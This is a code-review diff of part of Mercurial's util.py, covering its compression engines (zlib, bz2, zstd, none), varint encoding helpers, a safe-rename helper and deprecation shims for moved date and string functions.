3516 If bundle compression is supported, the class must also implement
3519 ``compressstream`` and `decompressorreader``.
3517 ``compressstream`` and `decompressorreader``.
3520
3518
3521 The docstring of this method is used in the help system to tell users
3519 The docstring of this method is used in the help system to tell users
3522 about this engine.
3520 about this engine.
3523 """
3521 """
3524 return None
3522 return None
3525
3523
3526 def wireprotosupport(self):
3524 def wireprotosupport(self):
3527 """Declare support for this compression format on the wire protocol.
3525 """Declare support for this compression format on the wire protocol.
3528
3526
3529 If this compression engine isn't supported for compressing wire
3527 If this compression engine isn't supported for compressing wire
3530 protocol payloads, returns None.
3528 protocol payloads, returns None.
3531
3529
3532 Otherwise, returns ``compenginewireprotosupport`` with the following
3530 Otherwise, returns ``compenginewireprotosupport`` with the following
3533 fields:
3531 fields:
3534
3532
3535 * String format identifier
3533 * String format identifier
3536 * Integer priority for the server
3534 * Integer priority for the server
3537 * Integer priority for the client
3535 * Integer priority for the client
3538
3536
3539 The integer priorities are used to order the advertisement of format
3537 The integer priorities are used to order the advertisement of format
3540 support by server and client. The highest integer is advertised
3538 support by server and client. The highest integer is advertised
3541 first. Integers with non-positive values aren't advertised.
3539 first. Integers with non-positive values aren't advertised.
3542
3540
3543 The priority values are somewhat arbitrary and only used for default
3541 The priority values are somewhat arbitrary and only used for default
3544 ordering. The relative order can be changed via config options.
3542 ordering. The relative order can be changed via config options.
3545
3543
3546 If wire protocol compression is supported, the class must also implement
3544 If wire protocol compression is supported, the class must also implement
3547 ``compressstream`` and ``decompressorreader``.
3545 ``compressstream`` and ``decompressorreader``.
3548 """
3546 """
3549 return None
3547 return None
3550
3548
3551 def revlogheader(self):
3549 def revlogheader(self):
3552 """Header added to revlog chunks that identifies this engine.
3550 """Header added to revlog chunks that identifies this engine.
3553
3551
3554 If this engine can be used to compress revlogs, this method should
3552 If this engine can be used to compress revlogs, this method should
3555 return the bytes used to identify chunks compressed with this engine.
3553 return the bytes used to identify chunks compressed with this engine.
3556 Else, the method should return ``None`` to indicate it does not
3554 Else, the method should return ``None`` to indicate it does not
3557 participate in revlog compression.
3555 participate in revlog compression.
3558 """
3556 """
3559 return None
3557 return None
3560
3558
3561 def compressstream(self, it, opts=None):
3559 def compressstream(self, it, opts=None):
3562 """Compress an iterator of chunks.
3560 """Compress an iterator of chunks.
3563
3561
3564 The method receives an iterator (ideally a generator) of chunks of
3562 The method receives an iterator (ideally a generator) of chunks of
3565 bytes to be compressed. It returns an iterator (ideally a generator)
3563 bytes to be compressed. It returns an iterator (ideally a generator)
3566 of bytes of chunks representing the compressed output.
3564 of bytes of chunks representing the compressed output.
3567
3565
3568 Optionally accepts an argument defining how to perform compression.
3566 Optionally accepts an argument defining how to perform compression.
3569 Each engine treats this argument differently.
3567 Each engine treats this argument differently.
3570 """
3568 """
3571 raise NotImplementedError()
3569 raise NotImplementedError()
3572
3570
3573 def decompressorreader(self, fh):
3571 def decompressorreader(self, fh):
3574 """Perform decompression on a file object.
3572 """Perform decompression on a file object.
3575
3573
3576 Argument is an object with a ``read(size)`` method that returns
3574 Argument is an object with a ``read(size)`` method that returns
3577 compressed data. Return value is an object with a ``read(size)`` that
3575 compressed data. Return value is an object with a ``read(size)`` that
3578 returns uncompressed data.
3576 returns uncompressed data.
3579 """
3577 """
3580 raise NotImplementedError()
3578 raise NotImplementedError()
3581
3579
3582 def revlogcompressor(self, opts=None):
3580 def revlogcompressor(self, opts=None):
3583 """Obtain an object that can be used to compress revlog entries.
3581 """Obtain an object that can be used to compress revlog entries.
3584
3582
3585 The object has a ``compress(data)`` method that compresses binary
3583 The object has a ``compress(data)`` method that compresses binary
3586 data. This method returns compressed binary data or ``None`` if
3584 data. This method returns compressed binary data or ``None`` if
3587 the data could not be compressed (too small, not compressible, etc).
3585 the data could not be compressed (too small, not compressible, etc).
3588 The returned data should have a header uniquely identifying this
3586 The returned data should have a header uniquely identifying this
3589 compression format so decompression can be routed to this engine.
3587 compression format so decompression can be routed to this engine.
3590 This header should be identified by the ``revlogheader()`` return
3588 This header should be identified by the ``revlogheader()`` return
3591 value.
3589 value.
3592
3590
3593 The object has a ``decompress(data)`` method that decompresses
3591 The object has a ``decompress(data)`` method that decompresses
3594 data. The method will only be called if ``data`` begins with
3592 data. The method will only be called if ``data`` begins with
3595 ``revlogheader()``. The method should return the raw, uncompressed
3593 ``revlogheader()``. The method should return the raw, uncompressed
3596 data or raise a ``RevlogError``.
3594 data or raise a ``RevlogError``.
3597
3595
3598 The object is reusable but is not thread safe.
3596 The object is reusable but is not thread safe.
3599 """
3597 """
3600 raise NotImplementedError()
3598 raise NotImplementedError()
3601
3599
3602 class _zlibengine(compressionengine):
3600 class _zlibengine(compressionengine):
3603 def name(self):
3601 def name(self):
3604 return 'zlib'
3602 return 'zlib'
3605
3603
3606 def bundletype(self):
3604 def bundletype(self):
3607 """zlib compression using the DEFLATE algorithm.
3605 """zlib compression using the DEFLATE algorithm.
3608
3606
3609 All Mercurial clients should support this format. The compression
3607 All Mercurial clients should support this format. The compression
3610 algorithm strikes a reasonable balance between compression ratio
3608 algorithm strikes a reasonable balance between compression ratio
3611 and size.
3609 and size.
3612 """
3610 """
3613 return 'gzip', 'GZ'
3611 return 'gzip', 'GZ'
3614
3612
3615 def wireprotosupport(self):
3613 def wireprotosupport(self):
3616 return compewireprotosupport('zlib', 20, 20)
3614 return compewireprotosupport('zlib', 20, 20)
3617
3615
3618 def revlogheader(self):
3616 def revlogheader(self):
3619 return 'x'
3617 return 'x'
3620
3618
3621 def compressstream(self, it, opts=None):
3619 def compressstream(self, it, opts=None):
3622 opts = opts or {}
3620 opts = opts or {}
3623
3621
3624 z = zlib.compressobj(opts.get('level', -1))
3622 z = zlib.compressobj(opts.get('level', -1))
3625 for chunk in it:
3623 for chunk in it:
3626 data = z.compress(chunk)
3624 data = z.compress(chunk)
3627 # Not all calls to compress emit data. It is cheaper to inspect
3625 # Not all calls to compress emit data. It is cheaper to inspect
3628 # here than to feed empty chunks through generator.
3626 # here than to feed empty chunks through generator.
3629 if data:
3627 if data:
3630 yield data
3628 yield data
3631
3629
3632 yield z.flush()
3630 yield z.flush()
3633
3631
3634 def decompressorreader(self, fh):
3632 def decompressorreader(self, fh):
3635 def gen():
3633 def gen():
3636 d = zlib.decompressobj()
3634 d = zlib.decompressobj()
3637 for chunk in filechunkiter(fh):
3635 for chunk in filechunkiter(fh):
3638 while chunk:
3636 while chunk:
3639 # Limit output size to limit memory.
3637 # Limit output size to limit memory.
3640 yield d.decompress(chunk, 2 ** 18)
3638 yield d.decompress(chunk, 2 ** 18)
3641 chunk = d.unconsumed_tail
3639 chunk = d.unconsumed_tail
3642
3640
3643 return chunkbuffer(gen())
3641 return chunkbuffer(gen())
3644
3642
3645 class zlibrevlogcompressor(object):
3643 class zlibrevlogcompressor(object):
3646 def compress(self, data):
3644 def compress(self, data):
3647 insize = len(data)
3645 insize = len(data)
3648 # Caller handles empty input case.
3646 # Caller handles empty input case.
3649 assert insize > 0
3647 assert insize > 0
3650
3648
3651 if insize < 44:
3649 if insize < 44:
3652 return None
3650 return None
3653
3651
3654 elif insize <= 1000000:
3652 elif insize <= 1000000:
3655 compressed = zlib.compress(data)
3653 compressed = zlib.compress(data)
3656 if len(compressed) < insize:
3654 if len(compressed) < insize:
3657 return compressed
3655 return compressed
3658 return None
3656 return None
3659
3657
3660 # zlib makes an internal copy of the input buffer, doubling
3658 # zlib makes an internal copy of the input buffer, doubling
3661 # memory usage for large inputs. So do streaming compression
3659 # memory usage for large inputs. So do streaming compression
3662 # on large inputs.
3660 # on large inputs.
3663 else:
3661 else:
3664 z = zlib.compressobj()
3662 z = zlib.compressobj()
3665 parts = []
3663 parts = []
3666 pos = 0
3664 pos = 0
3667 while pos < insize:
3665 while pos < insize:
3668 pos2 = pos + 2**20
3666 pos2 = pos + 2**20
3669 parts.append(z.compress(data[pos:pos2]))
3667 parts.append(z.compress(data[pos:pos2]))
3670 pos = pos2
3668 pos = pos2
3671 parts.append(z.flush())
3669 parts.append(z.flush())
3672
3670
3673 if sum(map(len, parts)) < insize:
3671 if sum(map(len, parts)) < insize:
3674 return ''.join(parts)
3672 return ''.join(parts)
3675 return None
3673 return None
3676
3674
3677 def decompress(self, data):
3675 def decompress(self, data):
3678 try:
3676 try:
3679 return zlib.decompress(data)
3677 return zlib.decompress(data)
3680 except zlib.error as e:
3678 except zlib.error as e:
3681 raise error.RevlogError(_('revlog decompress error: %s') %
3679 raise error.RevlogError(_('revlog decompress error: %s') %
3682 stringutil.forcebytestr(e))
3680 stringutil.forcebytestr(e))
3683
3681
3684 def revlogcompressor(self, opts=None):
3682 def revlogcompressor(self, opts=None):
3685 return self.zlibrevlogcompressor()
3683 return self.zlibrevlogcompressor()
3686
3684
3687 compengines.register(_zlibengine())
3685 compengines.register(_zlibengine())
3688
3686
3689 class _bz2engine(compressionengine):
3687 class _bz2engine(compressionengine):
3690 def name(self):
3688 def name(self):
3691 return 'bz2'
3689 return 'bz2'
3692
3690
3693 def bundletype(self):
3691 def bundletype(self):
3694 """An algorithm that produces smaller bundles than ``gzip``.
3692 """An algorithm that produces smaller bundles than ``gzip``.
3695
3693
3696 All Mercurial clients should support this format.
3694 All Mercurial clients should support this format.
3697
3695
3698 This engine will likely produce smaller bundles than ``gzip`` but
3696 This engine will likely produce smaller bundles than ``gzip`` but
3699 will be significantly slower, both during compression and
3697 will be significantly slower, both during compression and
3700 decompression.
3698 decompression.
3701
3699
3702 If available, the ``zstd`` engine can yield similar or better
3700 If available, the ``zstd`` engine can yield similar or better
3703 compression at much higher speeds.
3701 compression at much higher speeds.
3704 """
3702 """
3705 return 'bzip2', 'BZ'
3703 return 'bzip2', 'BZ'
3706
3704
3707 # We declare a protocol name but don't advertise by default because
3705 # We declare a protocol name but don't advertise by default because
3708 # it is slow.
3706 # it is slow.
3709 def wireprotosupport(self):
3707 def wireprotosupport(self):
3710 return compewireprotosupport('bzip2', 0, 0)
3708 return compewireprotosupport('bzip2', 0, 0)
3711
3709
3712 def compressstream(self, it, opts=None):
3710 def compressstream(self, it, opts=None):
3713 opts = opts or {}
3711 opts = opts or {}
3714 z = bz2.BZ2Compressor(opts.get('level', 9))
3712 z = bz2.BZ2Compressor(opts.get('level', 9))
3715 for chunk in it:
3713 for chunk in it:
3716 data = z.compress(chunk)
3714 data = z.compress(chunk)
3717 if data:
3715 if data:
3718 yield data
3716 yield data
3719
3717
3720 yield z.flush()
3718 yield z.flush()
3721
3719
3722 def decompressorreader(self, fh):
3720 def decompressorreader(self, fh):
3723 def gen():
3721 def gen():
3724 d = bz2.BZ2Decompressor()
3722 d = bz2.BZ2Decompressor()
3725 for chunk in filechunkiter(fh):
3723 for chunk in filechunkiter(fh):
3726 yield d.decompress(chunk)
3724 yield d.decompress(chunk)
3727
3725
3728 return chunkbuffer(gen())
3726 return chunkbuffer(gen())
3729
3727
3730 compengines.register(_bz2engine())
3728 compengines.register(_bz2engine())
3731
3729
3732 class _truncatedbz2engine(compressionengine):
3730 class _truncatedbz2engine(compressionengine):
3733 def name(self):
3731 def name(self):
3734 return 'bz2truncated'
3732 return 'bz2truncated'
3735
3733
3736 def bundletype(self):
3734 def bundletype(self):
3737 return None, '_truncatedBZ'
3735 return None, '_truncatedBZ'
3738
3736
3739 # We don't implement compressstream because it is hackily handled elsewhere.
3737 # We don't implement compressstream because it is hackily handled elsewhere.
3740
3738
3741 def decompressorreader(self, fh):
3739 def decompressorreader(self, fh):
3742 def gen():
3740 def gen():
3743 # The input stream doesn't have the 'BZ' header. So add it back.
3741 # The input stream doesn't have the 'BZ' header. So add it back.
3744 d = bz2.BZ2Decompressor()
3742 d = bz2.BZ2Decompressor()
3745 d.decompress('BZ')
3743 d.decompress('BZ')
3746 for chunk in filechunkiter(fh):
3744 for chunk in filechunkiter(fh):
3747 yield d.decompress(chunk)
3745 yield d.decompress(chunk)
3748
3746
3749 return chunkbuffer(gen())
3747 return chunkbuffer(gen())
3750
3748
3751 compengines.register(_truncatedbz2engine())
3749 compengines.register(_truncatedbz2engine())
3752
3750
3753 class _noopengine(compressionengine):
3751 class _noopengine(compressionengine):
3754 def name(self):
3752 def name(self):
3755 return 'none'
3753 return 'none'
3756
3754
3757 def bundletype(self):
3755 def bundletype(self):
3758 """No compression is performed.
3756 """No compression is performed.
3759
3757
3760 Use this compression engine to explicitly disable compression.
3758 Use this compression engine to explicitly disable compression.
3761 """
3759 """
3762 return 'none', 'UN'
3760 return 'none', 'UN'
3763
3761
3764 # Clients always support uncompressed payloads. Servers don't because
3762 # Clients always support uncompressed payloads. Servers don't because
3765 # unless you are on a fast network, uncompressed payloads can easily
3763 # unless you are on a fast network, uncompressed payloads can easily
3766 # saturate your network pipe.
3764 # saturate your network pipe.
3767 def wireprotosupport(self):
3765 def wireprotosupport(self):
3768 return compewireprotosupport('none', 0, 10)
3766 return compewireprotosupport('none', 0, 10)
3769
3767
3770 # We don't implement revlogheader because it is handled specially
3768 # We don't implement revlogheader because it is handled specially
3771 # in the revlog class.
3769 # in the revlog class.
3772
3770
3773 def compressstream(self, it, opts=None):
3771 def compressstream(self, it, opts=None):
3774 return it
3772 return it
3775
3773
3776 def decompressorreader(self, fh):
3774 def decompressorreader(self, fh):
3777 return fh
3775 return fh
3778
3776
3779 class nooprevlogcompressor(object):
3777 class nooprevlogcompressor(object):
3780 def compress(self, data):
3778 def compress(self, data):
3781 return None
3779 return None
3782
3780
3783 def revlogcompressor(self, opts=None):
3781 def revlogcompressor(self, opts=None):
3784 return self.nooprevlogcompressor()
3782 return self.nooprevlogcompressor()
3785
3783
3786 compengines.register(_noopengine())
3784 compengines.register(_noopengine())
3787
3785
3788 class _zstdengine(compressionengine):
3786 class _zstdengine(compressionengine):
3789 def name(self):
3787 def name(self):
3790 return 'zstd'
3788 return 'zstd'
3791
3789
3792 @propertycache
3790 @propertycache
3793 def _module(self):
3791 def _module(self):
3794 # Not all installs have the zstd module available. So defer importing
3792 # Not all installs have the zstd module available. So defer importing
3795 # until first access.
3793 # until first access.
3796 try:
3794 try:
3797 from . import zstd
3795 from . import zstd
3798 # Force delayed import.
3796 # Force delayed import.
3799 zstd.__version__
3797 zstd.__version__
3800 return zstd
3798 return zstd
3801 except ImportError:
3799 except ImportError:
3802 return None
3800 return None
3803
3801
3804 def available(self):
3802 def available(self):
3805 return bool(self._module)
3803 return bool(self._module)
3806
3804
3807 def bundletype(self):
3805 def bundletype(self):
3808 """A modern compression algorithm that is fast and highly flexible.
3806 """A modern compression algorithm that is fast and highly flexible.
3809
3807
3810 Only supported by Mercurial 4.1 and newer clients.
3808 Only supported by Mercurial 4.1 and newer clients.
3811
3809
3812 With the default settings, zstd compression is both faster and yields
3810 With the default settings, zstd compression is both faster and yields
3813 better compression than ``gzip``. It also frequently yields better
3811 better compression than ``gzip``. It also frequently yields better
3814 compression than ``bzip2`` while operating at much higher speeds.
3812 compression than ``bzip2`` while operating at much higher speeds.
3815
3813
3816 If this engine is available and backwards compatibility is not a
3814 If this engine is available and backwards compatibility is not a
3817 concern, it is likely the best available engine.
3815 concern, it is likely the best available engine.
3818 """
3816 """
3819 return 'zstd', 'ZS'
3817 return 'zstd', 'ZS'
3820
3818
3821 def wireprotosupport(self):
3819 def wireprotosupport(self):
3822 return compewireprotosupport('zstd', 50, 50)
3820 return compewireprotosupport('zstd', 50, 50)
3823
3821
3824 def revlogheader(self):
3822 def revlogheader(self):
3825 return '\x28'
3823 return '\x28'
3826
3824
3827 def compressstream(self, it, opts=None):
3825 def compressstream(self, it, opts=None):
3828 opts = opts or {}
3826 opts = opts or {}
3829 # zstd level 3 is almost always significantly faster than zlib
3827 # zstd level 3 is almost always significantly faster than zlib
3830 # while providing no worse compression. It strikes a good balance
3828 # while providing no worse compression. It strikes a good balance
3831 # between speed and compression.
3829 # between speed and compression.
3832 level = opts.get('level', 3)
3830 level = opts.get('level', 3)
3833
3831
3834 zstd = self._module
3832 zstd = self._module
3835 z = zstd.ZstdCompressor(level=level).compressobj()
3833 z = zstd.ZstdCompressor(level=level).compressobj()
3836 for chunk in it:
3834 for chunk in it:
3837 data = z.compress(chunk)
3835 data = z.compress(chunk)
3838 if data:
3836 if data:
3839 yield data
3837 yield data
3840
3838
3841 yield z.flush()
3839 yield z.flush()
3842
3840
3843 def decompressorreader(self, fh):
3841 def decompressorreader(self, fh):
3844 zstd = self._module
3842 zstd = self._module
3845 dctx = zstd.ZstdDecompressor()
3843 dctx = zstd.ZstdDecompressor()
3846 return chunkbuffer(dctx.read_from(fh))
3844 return chunkbuffer(dctx.read_from(fh))
3847
3845
3848 class zstdrevlogcompressor(object):
3846 class zstdrevlogcompressor(object):
3849 def __init__(self, zstd, level=3):
3847 def __init__(self, zstd, level=3):
3850 # Writing the content size adds a few bytes to the output. However,
3848 # Writing the content size adds a few bytes to the output. However,
3851 # it allows decompression to be more optimal since we can
3849 # it allows decompression to be more optimal since we can
3852 # pre-allocate a buffer to hold the result.
3850 # pre-allocate a buffer to hold the result.
3853 self._cctx = zstd.ZstdCompressor(level=level,
3851 self._cctx = zstd.ZstdCompressor(level=level,
3854 write_content_size=True)
3852 write_content_size=True)
3855 self._dctx = zstd.ZstdDecompressor()
3853 self._dctx = zstd.ZstdDecompressor()
3856 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3854 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3857 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3855 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3858
3856
3859 def compress(self, data):
3857 def compress(self, data):
3860 insize = len(data)
3858 insize = len(data)
3861 # Caller handles empty input case.
3859 # Caller handles empty input case.
3862 assert insize > 0
3860 assert insize > 0
3863
3861
3864 if insize < 50:
3862 if insize < 50:
3865 return None
3863 return None
3866
3864
3867 elif insize <= 1000000:
3865 elif insize <= 1000000:
3868 compressed = self._cctx.compress(data)
3866 compressed = self._cctx.compress(data)
3869 if len(compressed) < insize:
3867 if len(compressed) < insize:
3870 return compressed
3868 return compressed
3871 return None
3869 return None
3872 else:
3870 else:
3873 z = self._cctx.compressobj()
3871 z = self._cctx.compressobj()
3874 chunks = []
3872 chunks = []
3875 pos = 0
3873 pos = 0
3876 while pos < insize:
3874 while pos < insize:
3877 pos2 = pos + self._compinsize
3875 pos2 = pos + self._compinsize
3878 chunk = z.compress(data[pos:pos2])
3876 chunk = z.compress(data[pos:pos2])
3879 if chunk:
3877 if chunk:
3880 chunks.append(chunk)
3878 chunks.append(chunk)
3881 pos = pos2
3879 pos = pos2
3882 chunks.append(z.flush())
3880 chunks.append(z.flush())
3883
3881
3884 if sum(map(len, chunks)) < insize:
3882 if sum(map(len, chunks)) < insize:
3885 return ''.join(chunks)
3883 return ''.join(chunks)
3886 return None
3884 return None
3887
3885
3888 def decompress(self, data):
3886 def decompress(self, data):
3889 insize = len(data)
3887 insize = len(data)
3890
3888
3891 try:
3889 try:
3892 # This was measured to be faster than other streaming
3890 # This was measured to be faster than other streaming
3893 # decompressors.
3891 # decompressors.
3894 dobj = self._dctx.decompressobj()
3892 dobj = self._dctx.decompressobj()
3895 chunks = []
3893 chunks = []
3896 pos = 0
3894 pos = 0
3897 while pos < insize:
3895 while pos < insize:
3898 pos2 = pos + self._decompinsize
3896 pos2 = pos + self._decompinsize
3899 chunk = dobj.decompress(data[pos:pos2])
3897 chunk = dobj.decompress(data[pos:pos2])
3900 if chunk:
3898 if chunk:
3901 chunks.append(chunk)
3899 chunks.append(chunk)
3902 pos = pos2
3900 pos = pos2
3903 # Frame should be exhausted, so no finish() API.
3901 # Frame should be exhausted, so no finish() API.
3904
3902
3905 return ''.join(chunks)
3903 return ''.join(chunks)
3906 except Exception as e:
3904 except Exception as e:
3907 raise error.RevlogError(_('revlog decompress error: %s') %
3905 raise error.RevlogError(_('revlog decompress error: %s') %
3908 stringutil.forcebytestr(e))
3906 stringutil.forcebytestr(e))
3909
3907
3910 def revlogcompressor(self, opts=None):
3908 def revlogcompressor(self, opts=None):
3911 opts = opts or {}
3909 opts = opts or {}
3912 return self.zstdrevlogcompressor(self._module,
3910 return self.zstdrevlogcompressor(self._module,
3913 level=opts.get('level', 3))
3911 level=opts.get('level', 3))
3914
3912
# Make the zstd engine discoverable through the global compression registry.
compengines.register(_zstdengine())
3916
3914
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        # Only advertise engines whose backing module is importable here.
        if not engine.available():
            continue

        bt = engine.bundletype()
        # Engines without a user-facing bundle type name have no help entry.
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        entry = docobject()
        entry.__doc__ = doc
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype

        items[bt[0]] = entry

    return items
3948
3946
# Expose the bundle compression help entries to the i18n machinery so their
# docstrings get picked up for translation.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3953
3951
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    taken = others if others is not None else set()

    def isfree(name):
        # Usable when it collides with nothing we know about.
        return name not in ctx and name not in taken

    candidate = '%s~%s' % (f, tag)
    if isfree(candidate):
        return candidate
    # Keep appending increasing numeric suffixes until one is free.
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if isfree(candidate):
            return candidate
3976
3974
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    got = len(s)
    # A short read means the stream ended prematurely; treat as fatal.
    if got < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (got, n))
    return s
3985
3983
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    pieces = []
    remaining = value
    while True:
        group = remaining & 0x7f
        remaining >>= 7
        if remaining:
            # More 7-bit groups follow; flag continuation with the high bit.
            pieces.append(pycompat.bytechr(0x80 | group))
        else:
            # Final group: high bit clear terminates the varint.
            pieces.append(pycompat.bytechr(group))
            break

    return ''.join(pieces)
4022
4020
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        # Accumulate 7-bit groups, least significant first.
        value |= (byte & 0x7f) << shift
        if not (byte & 0x80):
            # High bit clear marks the final byte of the varint.
            return value
        shift += 7
4055
4053
4056 ###
4054 ###
4057 # Deprecation warnings for util.py splitting
4055 # Deprecation warnings for util.py splitting
4058 ###
4056 ###
4059
4057
def _deprecatedfunc(func, version):
    """Wrap ``func`` so every call emits a deprecation warning pointing at
    its new home (the submodule util.py was split into)."""
    def wrapped(*args, **kwargs):
        name = pycompat.sysbytes(func.__name__)
        # Strip the leading 'mercurial.' package prefix from the module path.
        modname = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
        msg = "'util.%s' is deprecated, use '%s.%s'" % (name, modname, name)
        nouideprecwarn(msg, version)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped
4069
4067
# Date handling moved to utils/dateutil.py; keep the old util.* names alive
# (with a deprecation warning) for one release cycle.
defaultdateformats = dateutil.defaultdateformats
extendeddateformats = dateutil.extendeddateformats
makedate = _deprecatedfunc(dateutil.makedate, '4.6')
datestr = _deprecatedfunc(dateutil.datestr, '4.6')
shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')

# String helpers moved to utils/stringutil.py; same deprecation shims.
escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
binary = _deprecatedfunc(stringutil.binary, '4.6')
stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
email = _deprecatedfunc(stringutil.email, '4.6')
ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
wrap = _deprecatedfunc(stringutil.wrap, '4.6')
parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now